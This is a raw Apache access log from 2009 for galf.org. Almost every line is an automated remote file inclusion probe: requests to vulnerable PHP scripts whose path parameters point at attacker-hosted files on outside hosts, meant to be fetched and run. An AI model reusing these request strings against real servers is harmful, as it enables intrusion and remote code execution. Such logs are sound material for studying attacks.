98.129.217.53 - - [09/Nov/2009:01:52:51 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://mobilemagic.sanook.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:01:54:41 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.191.177.210 - - [09/Nov/2009:01:54:41 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
65.55.207.136 - - [09/Nov/2009:01:56:09 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.136 - - [09/Nov/2009:01:57:35 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:02:04:20 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:02:04:20 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:02:04:20 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:02:06:16 -0800] "GET /logs/access_091012.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:02:06:16 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [09/Nov/2009:02:06:16 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.gomeins.de//styles/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:09:35 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
64.8.105.21 - - [09/Nov/2009:02:09:35 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
64.8.105.21 - - [09/Nov/2009:02:09:35 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
91.121.81.41 - - [09/Nov/2009:02:09:36 -0800] "GET /logs/access_090525.log//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.81.41 - - [09/Nov/2009:02:09:54 -0800] "GET /logs/access_090420.log//include/write.php?dir=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:02:10:01 -0800] "GET /rrors.php?error=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
67.214.143.99 - - [09/Nov/2009:02:10:01 -0800] "GET /logs/rrors.php?error=http://www.kfd-koeln.de//newsletter/images//test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:02:10:16 -0800] "GET /template.php?name=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:10:17 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "galf.org"
216.139.67.116 - - [09/Nov/2009:02:10:17 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "galf.org"
85.236.46.4 - - [09/Nov/2009:02:10:33 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
85.236.46.4 - - [09/Nov/2009:02:10:33 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
85.236.46.4 - - [09/Nov/2009:02:10:33 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
221.139.3.168 - - [09/Nov/2009:02:11:02 -0800] "GET /logs//skin/happycast/write.php?dir=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:11:02 -0800] "GET /skin/happycast/write.php?dir=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:11:02 -0800] "GET /logs/access_090907.log//skin/happycast/write.php?dir=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:11:03 -0800] "GET /logs/access.log//skin/happycast/write.php?dir=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:02:11:09 -0800] "GET /logs/access_090525.log//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [09/Nov/2009:02:11:09 -0800] "GET /logs/access_090504.log//admin/business_inc/saveserver.php?thisdir=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:02:12:19 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:02:12:19 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:02:12:19 -0800] "GET /logs/access_090309.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:22 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:22 -0800] "GET /logs/access_091012.log//components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:22 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:24 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:24 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.40.68.132 - - [09/Nov/2009:02:12:24 -0800] "GET /logs/access_091012.log//components/com_simpleboard/image_upload.php?sbp=http://cafe21.org//bbs/data/cartoon/images/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.6.232.171 - - [09/Nov/2009:02:12:30 -0800] "GET /logs/access_090629.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:04 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:04 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:04 -0800] "GET /logs/access_091012.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /logs/access_090406.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /logs/access_090406.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:13:36 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:42 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:42 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
211.51.139.133 - - [09/Nov/2009:02:13:42 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
202.30.48.8 - - [09/Nov/2009:02:14:13 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:14:14 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:02:14:36 -0800] "GET /?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:02:14:36 -0800] "GET /logs/access_090928.log//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:02:14:36 -0800] "GET /logs//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
110.45.146.152 - - [09/Nov/2009:02:15:04 -0800] "GET /logs/access_090720.log//?_zb_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:16:03 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
216.139.67.116 - - [09/Nov/2009:02:16:15 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "galf.org"
85.236.46.4 - - [09/Nov/2009:02:16:37 -0800] "GET /logs/access.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:49 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:49 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:49 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:49 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:49 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:17:50 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
218.234.21.178 - - [09/Nov/2009:02:19:34 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
218.234.21.178 - - [09/Nov/2009:02:19:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
218.234.21.178 - - [09/Nov/2009:02:19:34 -0800] "GET /logs/access_091012.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
218.234.21.178 - - [09/Nov/2009:02:20:00 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
218.234.21.178 - - [09/Nov/2009:02:20:00 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
218.234.21.178 - - [09/Nov/2009:02:20:00 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.rcanovas.com.br/route.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "galf.org"
216.73.105.71 - - [09/Nov/2009:02:20:30 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "galf.org"
216.73.105.71 - - [09/Nov/2009:02:20:30 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "galf.org"
216.73.105.71 - - [09/Nov/2009:02:20:30 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "galf.org"
202.30.48.8 - - [09/Nov/2009:02:21:04 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:21:04 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:02:22:37 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.229.7 - - [09/Nov/2009:02:22:37 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.229.7 - - [09/Nov/2009:02:22:38 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:26 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:26 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:26 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:42 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:42 -0800] "GET /logs/access.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:26:42 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.131.69.168 - - [09/Nov/2009:02:27:19 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
64.131.69.168 - - [09/Nov/2009:02:27:20 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.medisite.fr/id???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:02:28:20 -0800] "GET /logs/access_090921.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
216.73.105.71 - - [09/Nov/2009:02:29:59 -0800] "GET /logs/access_091012.log////skin/ggambo7002_board/comment_modify.php?dir=http://juria.ru/.injek/id23.txt??? HTTP/1.1" 404 - "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:31:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:31:06 -0800] "GET /logs/access_091012.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:31:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:32:14 -0800] "GET /logs/access_091012.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:32:14 -0800] "GET /?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:32:14 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:32:14 -0800] "GET /logs/access_091012.log/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.30.48.8 - - [09/Nov/2009:02:32:14 -0800] "GET /logs/?sourcedir=http://www.abruzzobooking.it/mambots/idxx.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [09/Nov/2009:02:32:32 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.230.112.35 - - [09/Nov/2009:02:32:51 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
204.14.90.22 - - [09/Nov/2009:02:33:35 -0800] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "-" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:34:22 -0800] "GET /logs/access_090511.log/include/admin.lib.inc.php?skin_root_path=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:34:22 -0800] "GET /include/admin.lib.inc.php?skin_root_path=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.3.168 - - [09/Nov/2009:02:34:22 -0800] "GET /logs/include/admin.lib.inc.php?skin_root_path=http://niswa.fileave.com/kerox/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:34:39 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:34:39 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.149.231.176 - - [09/Nov/2009:02:34:39 -0800] "GET /logs/access_091012.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.229.7 - - [09/Nov/2009:02:38:06 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.hackengine.net/scan/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.8.105.21 - - [09/Nov/2009:02:38:20 -0800] "GET /logs//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:38:20 -0800] "GET /logs/access_090608.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:38:20 -0800] "GET /common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:38:21 -0800] "GET /logs/access_090608.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:38:21 -0800] "GET /common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:38:21 -0800] "GET /logs//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
64.8.105.21 - - [09/Nov/2009:02:38:34 -0800] "GET /logs/access_090615.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
216.139.67.116 - - [09/Nov/2009:02:38:38 -0800] "GET /logs/access_090615.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.64" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:02:38:52 -0800] "GET /common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:02:38:52 -0800] "GET /logs/access_090608.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:02:38:53 -0800] "GET /logs//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
85.236.46.4 - - [09/Nov/2009:02:39:05 -0800] "GET /logs/access_090615.log//common/db.php?commonpath=http://approvedjobs.com/.safe??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
